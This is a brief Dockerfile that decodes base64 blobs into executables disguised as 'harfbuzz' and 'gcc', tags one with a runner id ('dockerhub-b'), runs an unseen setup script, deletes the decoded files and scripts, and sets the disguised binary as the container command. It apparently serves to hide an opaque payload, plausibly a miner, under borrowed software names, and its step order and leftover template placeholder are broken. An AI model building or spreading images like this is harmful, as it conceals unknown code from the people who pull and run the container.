FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > harfbuzz.log'

RUN base64 --decode harfbuzz.64 > harfbuzz
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY harfbuzz .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' harfbuzz
RUN bash ./docker.sh

RUN rm --force --recursive harfbuzz _REPO_NAME__.64 docker.sh gcc gcc.64

CMD harfbuzz
